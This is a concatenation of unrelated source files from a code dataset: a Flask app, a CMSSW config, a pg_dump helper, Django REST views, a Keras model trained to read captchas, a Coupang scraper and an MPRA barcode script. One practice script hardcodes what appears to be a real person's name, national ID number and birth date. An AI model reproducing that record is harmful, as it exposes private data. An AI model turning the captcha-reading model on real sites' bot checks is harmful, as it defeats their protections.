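# handlers' own terms (not runnable on its own):
#     form = ArtistForm(request.form)
#     if form.validate():
#         form.populate_obj(artist)
#         db.session.commit()
#     else:
#         flash(form.errors)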
Artist \" + data.name + \" could not be listed.\")\n else:\n flash(\"Artist \" + request.form[\"name\"] + \" was successfully listed!\")\n\n return render_template(\"pages/home.html\")\n\n\n# Shows\n# ----------------------------------------------------------------\n\n\n@app.route(\"/shows\")\ndef shows():\n\n # get all shows\n shows = Show.query.all()\n\n data = []\n\n # for each show, get venue and artist data\n for show in shows:\n\n # get artist data\n artist = Artist.query.get(show.artist_id)\n\n # get venue data\n venue = Venue.query.get(show.venue_id)\n\n data.append(\n {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n\n return render_template(\"pages/shows.html\", shows=data)\n\n\n@app.route(\"/shows/create\")\ndef create_shows():\n form = ShowForm()\n return render_template(\"forms/new_show.html\", form=form)\n\n\n@app.route(\"/shows/create\", methods=[\"POST\"])\ndef create_show_submission():\n error = False\n\n try:\n data = Show(\n venue_id=request.form[\"venue_id\"],\n artist_id=request.form[\"artist_id\"],\n start_time=request.form[\"start_time\"],\n )\n db.session.add(data)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Show could not be created.\")\n else:\n flash(\"Show was successfully created!\")\n\n return render_template(\"pages/home.html\")\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template(\"errors/404.html\"), 404\n\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template(\"errors/500.html\"), 500\n\n\nif not app.debug:\n file_handler = FileHandler(\"error.log\")\n file_handler.setFormatter(\n Formatter(\"%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]\")\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info(\"errors\")\n\n# ----------------------------------------------------------------------------#\n# Launch.\n# ----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == \"__main__\":\n app.run()\n\n# Or specify port manually:\n\"\"\"\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n\"\"\"\n","sub_path":"projects/01_fyyur/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"575884296","text":"# Run CSCIndexerAnalyzer2 - ptc - 20.11.2012\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) )\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.load(\"Configuration.Geometry.GeometryExtended_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.load(\"Geometry.CommonTopologies.globalTrackingGeometry_cfi\")\nprocess.load(\"Geometry.MuonNumbering.muonNumberingInitialization_cfi\")\n\nprocess.GlobalTag.globaltag = \"MC_61_V2::All\"\nprocess.load(\"Alignment.CommonAlignmentProducer.FakeAlignmentSource_cfi\")\nprocess.preferFakeAlign = 
cms.ESPrefer(\"FakeAlignmentSource\")\n\nprocess.load(\"CondCore.DBCommon.CondDBCommon_cfi\")\n\nprocess.dummy = cms.ESSource(\"EmptyESSource\",\n recordName = cms.string(\"CSCIndexerRecord\"),\n firstValid = cms.vuint32(1),\n iovIsRunNotTime = cms.bool(True)\n)\n\n##process.load(\"CalibMuon.CSCCalibration.CSCIndexer_cfi\")\n## The above cfi gives rise to the following line:\n\n##process.CSCIndexerESProducer = cms.ESProducer(\"CSCIndexerESProducer\", AlgoName = cms.string(\"CSCIndexerStartup\") )\nprocess.CSCIndexerESProducer = cms.ESProducer(\"CSCIndexerESProducer\", AlgoName = cms.string(\"CSCIndexerPostls1\") )\n\nprocess.analyze = cms.EDAnalyzer(\"CSCIndexerAnalyzer2\")\n\nprocess.test = cms.Path(process.analyze)\n\n","sub_path":"CalibMuon/CSCCalibration/test/runCSCIndexerAnalyzer2_UPG_cfg.py","file_name":"runCSCIndexerAnalyzer2_UPG_cfg.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"577458363","text":"import subprocess\nimport os\n\nfrom .base import BaseDump\n\n\nclass PostgreSQLDump(BaseDump):\n\n def dump(self, config, s3_bucket, s3_bucket_key_name, filepath,\n verbose=False, upload_callback=None):\n sqldump_cmd = [\n 'pg_dump',\n '-d', config['NAME'],\n '-h', config['HOST'],\n '-p', config['PORT'],\n '-U', config['USER']\n ]\n\n process = subprocess.Popen(\n sqldump_cmd, stdout=subprocess.PIPE,\n env=dict(os.environ, PGPASSWORD=config['PASSWORD'])\n )\n\n if verbose:\n print('Dumping PostgreSQL database: {database} to file {filepath}'.format(\n database=config['NAME'], filepath=filepath))\n\n with open(filepath, 'w+') as f:\n while True:\n buf = process.stdout.read(4096 * 1024) # Read 4 MB\n if buf:\n f.write(buf.decode(\"utf-8\"))\n if verbose:\n print('- Written 4 MB')\n else:\n break\n\n if verbose:\n print('+ Dump finished')\n\n if upload_callback is not None:\n upload_callback(f, s3_bucket, s3_bucket_key_name, verbose)\n","sub_path":"db_s3_backup/db_interface/postgresql.py","file_name":"postgresql.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"652687372","text":"from django.core.exceptions import FieldError, ObjectDoesNotExist\nfrom django.utils import timezone\nfrom rest_framework import generics\nfrom rest_framework.exceptions import ParseError\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser, AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED\n\nfrom .permissions import IsStudentOrReadOnly, IsOtherStudent, IsStudent, IsTheStudent\nfrom .serializers import StudentSerializer, CollegeSerializer, DepartmentSerializer, MajorSerializer, \\\n CourseSerializer, LectureSerializer, EvaluationSerializer, EvaluationDetailSerializer, MyTimeTableSerializer, \\\n BookmarkedTimeTableSerializer, ReceivedTimeTableSerializer, SendTimeTableSerializer, CopyTimeTableSerializer, \\\n TimeTableSerializer\nfrom .models import Student, College, Department, Major, Course, Lecture, Evaluation, MyTimeTable, BookmarkedTimeTable, \\\n ReceivedTimeTable, TimeTable\n\nfrom .recommend import recommend\n\n\nclass FilterAPIView(generics.GenericAPIView):\n \"\"\"\n Custom supporting APIView for filtering queryset based on query_params.\n\n By extending this class, the APIView will automatically filter queryset if the request\n has query_params.\n Keys of the query_params MUST be a valid key of the function 'QuerySet.filter', or\n 
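# Note on PostgreSQLDump.dump above: each 4 MB chunk of pg_dump output is
# decoded independently, so a multibyte UTF-8 character split across a chunk
# boundary would raise UnicodeDecodeError. Streaming the raw bytes sidesteps
# the problem; a self-contained sketch:
import shutil
import subprocess

def stream_dump_to_file(cmd, filepath, env=None):
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)
    with open(filepath, "wb") as f:  # binary mode: no per-chunk decoding
        shutil.copyfileobj(proc.stdout, f, length=4 * 1024 * 1024)
    return proc.wait()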
raises ParseError with status 400.\n \"\"\"\n\n def filter_queryset(self, queryset):\n errors = {}\n for key, value in self.request.query_params.items():\n try:\n queryset.filter(**{key: value})\n except (FieldError, ValueError) as e:\n error_key = '{}={}'.format(key, value)\n error_value = list(e.args)\n errors[error_key] = error_value\n if errors:\n raise ParseError(errors)\n return queryset.filter(**self.request.query_params.dict())\n\n\nclass StudentList(generics.ListAPIView):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAdminUser,)\n\n\nclass StudentCreate(generics.CreateAPIView):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (AllowAny,)\n\n\nclass StudentDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_object(self):\n return Student.objects.get_by_natural_key(self.request.user.username)\n\n\nclass CourseList(FilterAPIView, generics.ListAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass CourseDetail(generics.RetrieveAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass LectureList(FilterAPIView, generics.ListAPIView):\n queryset = Lecture.objects.all()\n serializer_class = LectureSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass LectureDetail(generics.RetrieveAPIView):\n queryset = Lecture.objects.all()\n serializer_class = LectureSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass EvaluationList(FilterAPIView, generics.ListCreateAPIView):\n queryset = Evaluation.objects.all()\n serializer_class = EvaluationSerializer\n permission_classes = (IsAuthenticated, IsStudentOrReadOnly)\n\n def perform_create(self, serializer):\n serializer.save(author=Student.objects.get_by_natural_key(self.request.user.username))\n\n\nclass EvaluationDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Evaluation.objects.all()\n serializer_class = EvaluationDetailSerializer\n permission_classes = (IsAuthenticated, IsTheStudent)\n\n\nclass EvaluationLikeIt(generics.RetrieveDestroyAPIView):\n queryset = Evaluation.objects.all()\n serializer_class = EvaluationDetailSerializer\n permission_classes = (IsAuthenticated, IsOtherStudent)\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.like_it.add(Student.objects.get_by_natural_key(request.user.username))\n instance.save()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.like_it.remove(Student.objects.get_by_natural_key(request.user.username))\n instance.save()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass MyTimeTableList(FilterAPIView, generics.ListCreateAPIView):\n \"\"\"\n If the student have a TimeTable with given year and semester already,\n the existing TimeTable will be overwritten by new TimeTable.\n \"\"\"\n serializer_class = MyTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return MyTimeTable.objects.filter(owner__username=self.request.user.username)\n\n def perform_create(self, serializer):\n owner = Student.objects.get_by_natural_key(self.request.user.username)\n 
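# If a timetable for this (year, semester) already exists for the student, delete it\n        # first so the new one replaces it (the overwrite behaviour promised in the class docstring).\n        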
try:\n            old_time_table = MyTimeTable.objects.get(year=serializer.validated_data['year'], semester=serializer.validated_data['semester'], owner=owner)\n            old_time_table.delete()\n        except ObjectDoesNotExist:\n            pass\n        serializer.save(owner=owner)\n\n\nclass MyTimeTableDetail(generics.RetrieveUpdateDestroyAPIView):\n    serializer_class = MyTimeTableSerializer\n    permission_classes = (IsAuthenticated, IsStudent)\n\n    def get_queryset(self):\n        return MyTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass BookmarkedTimeTableList(FilterAPIView, generics.ListCreateAPIView):\n    serializer_class = BookmarkedTimeTableSerializer\n    permission_classes = (IsAuthenticated, IsStudent)\n\n    def get_queryset(self):\n        return BookmarkedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n    def perform_create(self, serializer):\n        serializer.save(owner=Student.objects.get_by_natural_key(self.request.user.username))\n\n\nclass BookmarkedTimeTableDetail(generics.RetrieveUpdateDestroyAPIView):\n    serializer_class = BookmarkedTimeTableSerializer\n    permission_classes = (IsAuthenticated, IsStudent)\n\n    def get_queryset(self):\n        return BookmarkedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass ReceivedTimeTableList(FilterAPIView, generics.ListAPIView):\n    serializer_class = ReceivedTimeTableSerializer\n    permission_classes = (IsAuthenticated, IsStudent)\n\n    def get_queryset(self):\n        return ReceivedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass ReceivedTimeTableDetail(generics.RetrieveDestroyAPIView):\n    serializer_class = ReceivedTimeTableSerializer\n    permission_classes = (IsAuthenticated, IsStudent)\n\n    def get_queryset(self):\n        return ReceivedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass ReceiveTimeTable(generics.RetrieveAPIView):\n    \"\"\"\n    Perform receiving the TimeTable.\n    \"\"\"\n    serializer_class = ReceivedTimeTableSerializer\n    permission_classes = (IsAuthenticated, IsStudent)\n\n    def get_queryset(self):\n        return ReceivedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n    def retrieve(self, request, *args, **kwargs):\n        time_table = self.get_object()\n        if time_table.received_at is None:\n            time_table.received_at = timezone.now()\n            time_table.save()\n        serializer = self.get_serializer(time_table)\n        return Response(serializer.data)\n\n\nclass CopyTimeTable(generics.CreateAPIView):\n    \"\"\"\n    Base APIView for copying or overwriting TimeTable.\n    \"\"\"\n    permission_classes = (IsAuthenticated, IsStudent)\n    serializer_class = CopyTimeTableSerializer\n\n    def get_serializer(self, *args, **kwargs):\n        serializer_class = self.get_serializer_class()\n        kwargs['context'] = self.get_serializer_context()\n        return serializer_class(*args, **kwargs, owner=Student.objects.get_by_natural_key(self.request.user.username))\n\n    def create(self, request, *args, **kwargs):\n        serializer = self.get_serializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        new_time_table_id = self.perform_create(serializer)\n        return Response({\"created_time_table\": new_time_table_id}, status=HTTP_201_CREATED)\n\n\nclass CopyToMyTimeTable(CopyTimeTable):\n    def perform_create(self, serializer):\n        time_table = TimeTable.objects.get(pk=serializer.data['time_table_id'])\n        owner = Student.objects.get_by_natural_key(serializer.owner)\n        try:\n            old_time_table = MyTimeTable.objects.get(year=time_table.year, semester=time_table.semester, owner=owner)\n            old_time_table.delete()\n        except ObjectDoesNotExist:\n            pass\n        new_time_table = 
MyTimeTable(other=time_table, owner=owner)\n        new_time_table.save_m2m()\n        return new_time_table.id\n\n\nclass BookmarkTimeTable(CopyTimeTable):\n    def perform_create(self, serializer):\n        time_table = TimeTable.objects.get(pk=serializer.data['time_table_id'])\n        owner = Student.objects.get_by_natural_key(serializer.owner)\n        new_time_table = BookmarkedTimeTable(other=time_table, owner=owner)\n        new_time_table.save_m2m()\n        return new_time_table.id\n\n\nclass SendTimeTable(CopyTimeTable):\n    serializer_class = SendTimeTableSerializer\n\n    def perform_create(self, serializer):\n        time_table = TimeTable.objects.get(pk=serializer.data['time_table_id'])\n        owner = Student.objects.get_by_natural_key(serializer.data['receiver_name'])\n        sender = Student.objects.get_by_natural_key(serializer.owner)\n        new_time_table = ReceivedTimeTable(other=time_table, owner=owner, sender=sender)\n        new_time_table.save_m2m()\n        return new_time_table.id\n\n\nclass CollegeList(FilterAPIView, generics.ListAPIView):\n    queryset = College.objects.all()\n    serializer_class = CollegeSerializer\n    permission_classes = (AllowAny,)\n\n\nclass DepartmentList(FilterAPIView, generics.ListAPIView):\n    queryset = Department.objects.all()\n    serializer_class = DepartmentSerializer\n    permission_classes = (AllowAny,)\n\n\nclass MajorList(FilterAPIView, generics.ListAPIView):\n    queryset = Major.objects.all()\n    serializer_class = MajorSerializer\n    permission_classes = (AllowAny,)\n\n\nclass RecommendView(generics.ListAPIView):\n    serializer_class = TimeTableSerializer\n    permission_classes = (IsAuthenticated, IsStudent)\n\n    def get_queryset(self):\n        options = self.request.query_params.copy()\n        student = Student.objects.get_by_natural_key(self.request.user.username)\n        return recommend(options, student)\n","sub_path":"backend/ttrs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288725853","text":"datos_basicos = {\n    \"nombres\":\"Leonardo Jose\",\n    \"apellidos\":\"Caballero Garcia\",\n    \"cedula\":\"26938401\",\n    \"fecha_nacimiento\":\"03/12/1980\",\n    \"lugar_nacimiento\":\"Maracaibo, Zulia, Venezuela\",\n    \"nacionalidad\":\"Venezolana\",\n    \"estado_civil\":\"Soltero\"\n}\nclave = datos_basicos.keys()\nvalor = datos_basicos.values()\n\ncantidad_datos = datos_basicos.items()\n\nfor clave, valor in cantidad_datos:\n    print(clave + \": \" + valor)","sub_path":"Unidad 3/diccionariosConFor.py","file_name":"diccionariosConFor.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159686096","text":"from captcha.image import ImageCaptcha\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport string\nfrom keras import backend as K\nfrom keras.models import *\nfrom keras.layers import *\nimport keras\n#\n# Notes\n# generate_image(chars)  the core method: returns an Image object of a captcha rendering chars.\n# create_captcha_image(chars, color, background)  the implementation behind generate_image; override it to customize the captcha style.\n# create_noise_dots(image, color, width=3, number=30)  adds noise dots to the captcha.\n# create_noise_curve(image, color)  adds a noise curve to the captcha.\n#\n\n# \"captcha\" means verification code!\n# The captcha alphabet contains the digits 0-9 plus the 26 uppercase letters\ncharacters = string.digits + string.ascii_uppercase\nprint(characters)\n# Set the generated image size and the total number of classes; n_class adds one to reserve a slot for the CTC blank label\nwidth, height, n_len, n_class = 170, 80, 4, len(characters)+1\n#\n# Configure the captcha generator\n# When instantiating ImageCaptcha(width=160, height=60, fonts=None, font_sizes=None), four arguments can be passed:\n# width: 
the width of the generated captcha image; defaults to 160 pixels;\n# height: the height of the generated captcha image; defaults to 60 pixels;\n# fonts: font file paths used when drawing the captcha; defaults to the module's bundled DroidSansMono.ttf font.\n#   Pass a list or tuple of font files and one is chosen at random for each captcha;\n# font_sizes: controls the captcha font size; like fonts, accepts a list or tuple and a size is used at random.\n#\ngenerator = ImageCaptcha(width=width, height=height, fonts=None, font_sizes=None)\nprint(generator)\n# Practise first with fixed-length, four-character captchas\nrandom_str = ''.join([random.choice(characters) for j in range(4)])\nimg = generator.generate_image(random_str)\nplt.imshow(img)\nplt.title(random_str)\nplt.show()\n# ---------------------------------------------------------------------------------------\n\nrnn_size = 128\ninput_tensor = Input((height,width, 3))\nx = input_tensor\n\nfor i in range(4):\n    x = Convolution2D(32, 3, 3, activation='relu')(x)\n    x = keras.layers.BatchNormalization(axis=-1)(x)\n    x = Convolution2D(32, 3, 3, activation='relu')(x)\n    x = keras.layers.BatchNormalization(axis=-1)(x)\n    if i < 3:\n        x = MaxPooling2D(pool_size=(2, 2))(x)\n    else:\n        x = MaxPooling2D(pool_size=(2, 1))(x)\n\n# Record the CNN output shape; the loss computation needs this information\n# conv_shape=(batch_size, output height, output width, output depth)\nconv_shape = x.get_shape()\nprint(conv_shape[0])\nprint(conv_shape[1])\nprint(conv_shape[2])\nprint(conv_shape[3])\n# Go from (batch_size, output height, output width, output depth) to (batch_size, output width, output depth*output height)\nx = Reshape(target_shape=(int(conv_shape[2]), int(conv_shape[1]*conv_shape[3])))(x)\nconv_shape2 = x.get_shape()\nprint(conv_shape2)\n\nx = Dense(32, activation='relu')(x)\nx = Dropout(0.25)(x)\nx = Dense(n_class, activation='softmax')(x)\n\n\n# Wrap the model used for prediction\nbase_model = Model(input=input_tensor, output=x)\n\n# -------------------------------------------------------------------------------------------------------------- #\n\n# CTC loss needs four pieces of information:\n# labels\n# predictions\n# CNN output width\n# the number of characters contained in the predicted image\n\ndef ctc_lambda_func(args):\n    y_pred, labels, input_length, label_length = args\n    return K.ctc_batch_cost(labels, y_pred, input_length, label_length)\n# Set up the information fed to the CTC loss\n# n_len : the label string length\nlabels = Input(name='the_labels', shape=[n_len], dtype='float32')\ninput_length = Input(name='input_length', shape=[1], dtype='int64')\nlabel_length = Input(name='label_length', shape=[1], dtype='int64')\nloss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([x, labels, input_length, label_length])\n# This model is the one used to compute the loss\nmodel = Model(input=[input_tensor, labels, input_length, label_length], output=[loss_out])\n# loss is lambda y_true, y_pred: y_pred because the loss is already computed inside the network,\n# which outputs y_true, y_pred, and we only need y_pred\nmodel.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer='SGD')\nmodel.summary()\n\n# Design a generator that produces training data,\n# including the extra information required by the loss:\n# X = input images\n# np.ones(batch_size)*int(conv_shape[2]) = CNN output feature map width\n# np.ones(batch_size)*n_len = string length (may vary)\n\ndef gen(batch_size=128):\n    X = np.zeros((batch_size,height, width, 3), dtype=np.uint8)\n    y = np.zeros((batch_size, n_len), dtype=np.uint8)\n    while True:\n        generator = ImageCaptcha(width=width, height=height)\n        for i in range(batch_size):\n            random_str = ''.join([random.choice(characters) for j in range(4)])\n            X[i] = np.array(generator.generate_image(random_str))\n            y[i] = [characters.find(x) for x in random_str]\n        yield [X, y,np.ones(batch_size)*int(conv_shape[2]), np.ones(batch_size)*n_len], np.ones(batch_size)\nnext_ge=gen(batch_size=1)\ntest_ge=next(next_ge)\nplt.imshow(test_ge[0][0][0])\nprint('Label: ',test_ge[0][1])\nprint('CNN output width: ',test_ge[0][2])\nprint('String length (may vary): ',test_ge[0][3])\nmodel.fit_generator(gen(32), steps_per_epoch=300, 
epochs=60)\n\n\n\n\n\n","sub_path":"pratice/lesson22.py","file_name":"lesson22.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"169485914","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport chromedriver_autoinstaller\nimport subprocess\nimport shutil\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom Selenium_Function.open import *\n\nclass Coupang_Shopping_Mall:\n    def Coupangl(self):\n        driver=open_Shopping().retrieval()\n        url = \"https://www.coupang.com/\"\n        driver.get(url)\n        elem = WebDriverWait(driver, 1000).until(EC.presence_of_element_located((By.XPATH, \"//*[@id='searchOptionForm']/div[1]\")))\n        print(\"Success\")\n        prev_height = driver.execute_script(\"return document.body.scrollHeight\")\n        # Repeat until the page stops growing\n        while True:\n            # scroll to the bottom, then wait briefly for lazy-loaded content\n            driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight)\")\n            time.sleep(1)\n            # Get and store the current document height\n            curr_height = driver.execute_script(\"return document.body.scrollHeight\")\n            if curr_height == prev_height:\n                break\n            \n            prev_height = curr_height\n        \n        print(\"Scrolling finished\")\n        soup = BeautifulSoup(driver.page_source, \"lxml\")\n        \n        items = soup.find_all(\"li\", attrs={\"class\":re.compile(\"^search-product\")})\n        #print(items[0].find(\"div\", attrs={\"class\":\"name\"}).get_text())\n        for item in items:\n            \n            # Skip sponsored (ad) products\n            ad_badge = item.find(\"span\", attrs={\"class\":\"ad-badge-text\"})\n            if ad_badge:\n                print(\"Skipping ad product\")\n                continue\n            \n            name = item.find(\"div\", attrs={\"class\":\"name\"}).get_text() # product name\n            \n            \n            price = item.find(\"strong\", attrs={\"class\":\"price-value\"}).get_text() # price\n            \n            # Only look at items with 100+ reviews and a rating of 4.5 or higher\n            rate = item.find(\"em\", attrs={\"class\":\"rating\"}) # rating\n            if rate:\n                rate = rate.get_text()\n            else:\n                print(\"Skipping product with no rating\")\n                continue\n            \n            rate_cnt = item.find(\"span\", attrs={\"class\":\"rating-total-count\"}) # number of ratings \n            if rate_cnt:\n                rate_cnt = rate_cnt.get_text() # e.g. (26)\n                rate_cnt = rate_cnt[1:-1]\n                #print(\"review count\", rate_cnt)\n            else:\n                print(\"Skipping product with no rating count\")\n                continue\n            \n            print(name, price, rate, rate_cnt)","sub_path":"Shopling_product_registration/Shopping_mall/test/coupang.py","file_name":"coupang.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"253707578","text":"#!/usr/bin/python\r\n\r\n#Use multiple alignment files to get the correct alignment between the cbp mouse enhancers and human\r\n\r\nimport fileinput\r\nimport subprocess\r\nimport sys\r\nimport os\r\nfrom os import path\r\nimport glob\r\nimport re\r\nimport math;\r\nimport io;\r\nimport gzip;\r\n\r\nfrom datetime import datetime\r\n\r\n\r\n\r\n#import urllib.request\r\n#from urllib.request import urlopen\r\n#import xml.etree.ElementTree as ET\r\n#from xml.etree.ElementTree import parse\r\n\r\n#from Bio.Seq import Seq\r\n#from Bio.Alphabet import IUPAC\r\n#from Bio.Alphabet.IUPAC import unambiguous_dna, ambiguous_dna\r\n#from Bio import SeqIO\r\n#from Bio.SeqRecord import SeqRecord\r\n\r\n\r\n#perl -p -e 's/\\r//g' startingAnnot/ensembl/targetProteins.ensp.2.1.1.txt > startingAnnot/ensembl/targetProteins.ensp.2.1.2.txt\r\n\r\n#Get information from DESeq2 about significance of enhancer difference\r\n#Intersect with mouse enhancers (must be greater than 50bp to count)\r\n#Get the 0.9 quantiles over each 
region\r\n#Annotate the enhancer with the closest gene\r\n#Annotate the file with chromatin state\r\n#concat.allInfo.2.1.py brings everything together into one file\r\n\r\n#awk '{a[$4]++} END {print length(a)}' mergeMark.3.3.bed, print the number of unique original ids\r\n\r\n#pip3 install biopython --user\r\n\r\n################################################\r\n# Initialization #\r\n################################################\r\n\r\n#initBedStr = \"use BEDTools\";\r\n#print initBedStr\r\n#subprocess.Popen(initBedStr, shell=True).wait();\r\n\r\n#srun --partition=pfen2 --mem=8G --pty bash\r\n#module load python36\r\n#cd /home/apfennin/projects/covidTest/orthGene/\r\n\r\n\r\n################################################\r\n# Functions #\r\n################################################\r\n\r\n\r\n\r\n\r\n\r\n################################################\r\n# Version control #\r\n################################################\r\n#Version 1.1.1 - Does basic quantification of MPRA barcodes\r\n#Version 1.1.2 - Updated to loop through all fastq files\r\n#Version 2.1.1 - Update to work in parallel per file\r\n# - Read in GZ fastq\r\n\r\n\r\n################################################\r\n# PrepCode #\r\n################################################\r\n\r\n#Get a subset of the GTF file that only include CDS entries\r\n#OLd\r\n#awk -vOFS='\\t' -vFS='\\t' '{if ($3 == \"CDS\") {print $0}}' startingAnnot/GRCh38_latest_genomic.gtf > startingAnnot/GRCh38_latest_genomic_onlyCds.gtf\r\n\r\n#Copy test files to run\r\n\r\n#head /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/1-3-R-11/1-3-R-11_R1_001.fastq -n 1000 > input/1-3-R-11_R1_001.test.fastq\r\n\r\n#head /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/1-3-D-19/1-3-D-19_R1_001.fastq -n 1000 > input/1-3-D-19_R1_001.test.fastq\r\n\r\n#grep TCAGAACATGAGACTC /projects/MPRA/MPRA/MPRAi/MPRAi_batch1mice_1-208906698/FASTQ_Generation_2020-11-06_19_51_52Z-338176598/MPRA_Array1_sequences\r\n\r\n################################################\r\n# Command Line Run #\r\n################################################\r\n\r\n#Location\r\n#/projects/MPRA/andreas/21_06_arrayProc\r\n\r\n#module load python36\r\n#cd /projects/MPRA/andreas/21_06_arrayProc\r\n\r\n\r\n#python3 code/orthoGene_200M.2.1.1.py startingAnnot/GRCh38_latest_genomic_onlyCds.gtf startingAnnot/refSeq2Chr.04-06-20.1.txt NP_068576.1 zoonomia/zoonomiaGuide_4-6-20_2.csv /data/pfenninggroup/align/mam200/alignment_files/200m-v1.hal xSpecProtBed\r\n\r\n#python3 arrayProc.1.1.1.py input/Sample_index.txt /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/ /projects/MPRA/MPRA/MPRAi/MPRAi_batch1mice_1-208906698/FASTQ_Generation_2020-11-06_19_51_52Z-338176598/MPRA_Array1_sequences\r\n\r\n#python3 arrayProc.1.1.2.py input/Sample_index.txt /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/ /projects/MPRA/MPRA/MPRAi/MPRAi_batch1mice_1-208906698/FASTQ_Generation_2020-11-06_19_51_52Z-338176598/MPRA_Array1_sequences\r\n\r\n#python3 arrayProc.2.1.1.py input/ input/MPRA_Array1_sequences 105DLiver 1-3-R-11_R1_001.test.fastq countsV2/ qcV2/\r\n\r\n#python3 arrayProc.2.1.1.py /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz2/ input/MPRA_Array1_sequences 105DLiver 105DLiver_R1_001.fastq.gz countsV2/ qcV2/\r\n\r\n################################################\r\n# Parameters #\r\n################################################\r\n\r\n\r\n#Read in general information\r\n#indexMapFn = str(sys.argv[1]); #The file that contains index information\r\nseqDir = str(sys.argv[1]); #The directory 
that contains the fastqs\r\nbarcodeMapFn = str(sys.argv[2]); #The map between barcodes and enhancers\r\n\n#Read in general information\nsampName = str(sys.argv[3]); #105DLiver\nfastqFn = str(sys.argv[4]); #105DLiver_R1_001.fastq.gz\ncountsDir = str(sys.argv[5]); #countsV2\nqcDir = str(sys.argv[6]); #qcV2\n\n\n################################################\r\n# Program Control #\r\n################################################\r\n\n\n#Get genome stats\nloopDetailedB = False;\n\nloopFastB = True;\n\r\nwriteCountsB = True;\r\n\r\n\r\n################################################\r\n# Read in basic information from the annotation files #\r\n################################################\r\n\r\n######### Create a list of barcodes and their associated index ###############\r\n\r\nrcCharD = {};\r\nrcCharD['A'] = 'T';\r\nrcCharD['T'] = 'A';\r\nrcCharD['C'] = 'G';\r\nrcCharD['G'] = 'C';\r\nrcCharD['N'] = 'N';\r\n\r\ndef rcSeqFc(seq) :\r\n seq2 = \"\";\r\n for curChar in seq :\r\n seq2 = rcCharD[curChar] + seq2;\r\n #seq3 = seq2[::-1]\r\n return(seq2);\r\n\r\nbarcode2indexD = {}; #Maps barcodes to the index number\r\nbarcodeRc2indexD = {}; #Maps barcode revComp to the index 